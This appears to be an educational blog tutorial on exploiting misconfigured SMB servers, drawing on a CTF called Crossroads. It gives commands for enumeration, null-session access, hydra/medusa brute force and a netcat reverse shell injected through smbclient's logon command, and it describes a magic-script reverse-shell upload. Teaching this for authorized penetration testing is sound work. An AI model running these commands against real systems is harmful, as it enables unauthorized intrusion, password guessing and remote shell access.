Exploiting Misconfigurations in SMB Servers

What is Server Message Block (SMB) ?

The Server Message Block is a client-server communication protocol used to share files, printers, serial ports, and miscellaneous communications between nodes on a network. It is a network file sharing protocol that allows applications on a computer to read and write to files and also requests services from server programs in a computer network.

SMB has been used primarily on Windows machines, however, other operating systems - Linux and MacOS, have components(softwares) used to connect to SMB resources. The predominant component used for SMB implementation on non-Windows machines is the Samba. SMB has evolved over the years to with different version developed, SMBv1, SMBv2 and SMBv3 to improve security and functionality.

Common ports on SMB servers are

1. 135 - RPC

2. 139 - NetBIOS Session

3. 389 - LDAP Session

4. 445 - SMB File Service

5. 9389 - Active Directory Web Services

6.137 - NetBIOS Name Service

7. 138 NetBIOS Datagram

Common SMB Misconfigurations

The SMB protocol has been subject to various attacks and these attacks have been made possible by a plethora of attack vectors of which includes misconfigurations. Common SMB misconfigurations include:

1. Guest Access: Public or guest access to sensitive shares can leak critical information like configuration files, user credentials, or backups.

2. Weak Permissions: If shares are writeable, attackers can upload malicious files (e.g., scripts, backdoors).

3. SMBv1 Enabled: SMBv1 is outdated and vulnerable to exploits like EternalBlue (used in WannaCry).

4. Credential Exposure: Misconfigurations might allow access to sensitive files like:

• Passwords.txt

• Database backups

• Configuration files with hard coded credentials and enabled permissions(e.g. smb.conf)

5. Lack of Account Lockout: Enables brute force attacks.

6. Null Sessions

Exploiting SMB

Now, let’s try to exploiting a vulnerable machine running SMB after identifying that port 139 and 445 are open. We’ll use gain access to the machine using the 7 stages of the cyber kill chain, explained in the following steps:

1. As started earlier, we have already identified ports 139 and 445 being open through a nmap scan. However, you can look out for smb services on a target with the command - nmap -p 445 --script=smb-* <target-ip>

2. Next up, enumerate the identified SMB server for a variety of information. Here, you can use smbclient, rpcclient or even enum4linux. For this piece, using enum4linux is the most straightforward and by default popular pentesting Linux distros come with it pre-installed.

   The command is this enum4linux -a <target-ip>. This command will list workgroups available, users configured, available files shares, password policy, available null sessions, etc on the smb server. With this information gathered, the server can be exploited.

3. If Null sessions are found, we can connect to a share using the command - smbclient //<target-ip>/<share-name> -N. However, in case you still want to confirm that null sessions are available on the server, you can check using rpcclient - rpcclient -U "" -N <target_ip>. If the rpcclient command is successful, then there’s a null session on the server.

   Further or confirmatory enumeration can be done using smbclient or rpcclient to find users, groups and shares on the server. Although, they will be the same as found by enum4linux.

4. Some of the shares found my be protected using passwords while some might not. However, do not always expect a very strong security password (though some might have). The identified password policy should give you an insight to how strong the password(s) can be but often weak passwords are common misconfigurations found.

5. If a password policy was found, and a minimum and maximum password length identified, the script below can be use to filter possible matches for the password.

    #!/bin/bash
   
    # Check if correct number of arguments is passed
    if [ "$#" -lt 2 ]; then
        echo "Usage: $0 <wordlist> <min_length> [max_length]"
        exit 1
    fi
   
    # Arguments
    WORDLIST=$1
    MIN_LENGTH=$2
    MAX_LENGTH=$3
    OUTPUT_FILE="filtered_list.txt"
   
    # Validate inputs
    if ! [[ -f "$WORDLIST" ]]; then
        echo "Error: Wordlist file '$WORDLIST' not found."
        exit 1
    fi
   
    if ! [[ "$MIN_LENGTH" =~ ^[0-9]+$ ]]; then
        echo "Error: Minimum length must be an integer."
        exit 1
    fi
   
    if [ -n "$MAX_LENGTH" ] && ! [[ "$MAX_LENGTH" =~ ^[0-9]+$ ]]; then
        echo "Error: Maximum length must be an integer if provided."
        exit 1
    fi
   
    if [ -n "$MAX_LENGTH" ] && [ "$MIN_LENGTH" -gt "$MAX_LENGTH" ]; then
        echo "Error: Minimum length cannot be greater than maximum length."
        exit 1
    fi
   
    # Filter the wordlist based on the lengths
    if [ -z "$MAX_LENGTH" ]; then
        # No maximum length provided
        awk -v min="$MIN_LENGTH" 'length($0) >= min' "$WORDLIST" > "$OUTPUT_FILE"
    else
        # Both minimum and maximum lengths provided
        awk -v min="$MIN_LENGTH" -v max="$MAX_LENGTH" 'length($0) >= min && length($0) <= max' "$WORDLIST" > "$OUTPUT_FILE"
    fi
   
    echo "Filtered passwords saved in '$OUTPUT_FILE'."
   

   To use this script a wordlist must be available. Write the script to a filter.sh (or any filepath of your choice) and enable executable permission with the command chmod +x <filepath>.sh. Run the script with <filepath>.sh <path_to_wordlists> <min_num> [max_num].

   Then you can proceed to brute force the smb connection using either of hydra or medusa. However, using medusa is optimal and faster. The command are as follows:

   • hydra -L <usernames_list.txt> -P <password_list.txt> <target_ip> smb

   • medusa -h <target_ip> -U <usernames_list.txt> -P <passwords_list> -M smbnt

Note that any of the above command can be used after arranging the users found from our enumeration in a list to form the usernames_list.txt. I’d say that brute forcing has a 50-50 chance of getting the password as you may have to brute force multiple password lists to get the password (if the password eventually is in one of your numerous lists.

In the CTF, Crossroads, you can see that we were able to brute force the smb server to get albert’s password.

6. There are numerous wordlist over the internet including the popular rockyou.txt. You can also get wordlists from The Art of Hacking.

7. With the password found, you can now access shares that have been protected.

8. You can also check using the guest/null or authenticated session to see if the logon command is available. If the logon command is available, a reverse shell can be spawn to get remote access. To check for logon command, enter the help command when access to the smb server has been established. If the the logon command is available, a shell can be spawn.

   • In the attacking machine create a netcat listener - nc -nvlp <port>.

   • Then enter the command when connected onto the smb server - logon "/=`nc <attacking_ip> <port> -e /bin/bash`"

   • If reverse shell was successful on the attacking machine’s terminal, use the command to take the terminal to an interactive mode - python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

9. If the logon isn’t available and we have access to the smb configuration file, we can view the contents of the configuration file to know how to exploit. With reference to the Crossroads CTF, we can see how the smb.conf file can be exploited if the magic script option of any of the identified shares is available and the same share has both read and write permissions. A reverse shell script can be written, saved as the same name of the magic script option and then uploaded to that particular share. The magic script option allows the execution of a script when files are written to the share. Once the script has be the uploaded, the listener created on the attacking machine is automatically given remote access.

The listed above are just few of the exploit metholodogies against SMB. However, amongst the versions of SMB, SMBv1 is most vulnerable to the following:

1. EternalBlue Exploit: Attackers can remotely execute malicious code by exploiting the flaw in SMBv1's handling of specially crafted packets and do not require authentication.

2. Man-in-the-Middle Attacks: Attackers can intercept and modify SMBv1 communications.Tools like Responder or MITMf can poison NetBIOS or LLMNR responses, redirecting SMB traffic to an attacker-controlled machine.

3. NTLM Attacks: Exploits SMBv1's use of NTLM (NT LAN Manager) for authentication.Allows attackers to relay NTLM authentication hashes to other services or systems.Tools like Responder, Impacket, and Metasploit can capture and relay NTLM hashes.

Disclaimer: This content is provided solely for educational and informational purposes. It is intended to demonstrate the use of cybersecurity tools and techniques for ethical hacking and penetration testing within a controlled and authorized environment. Any unauthorized use of this information is strictly prohibited and may result in legal consequences.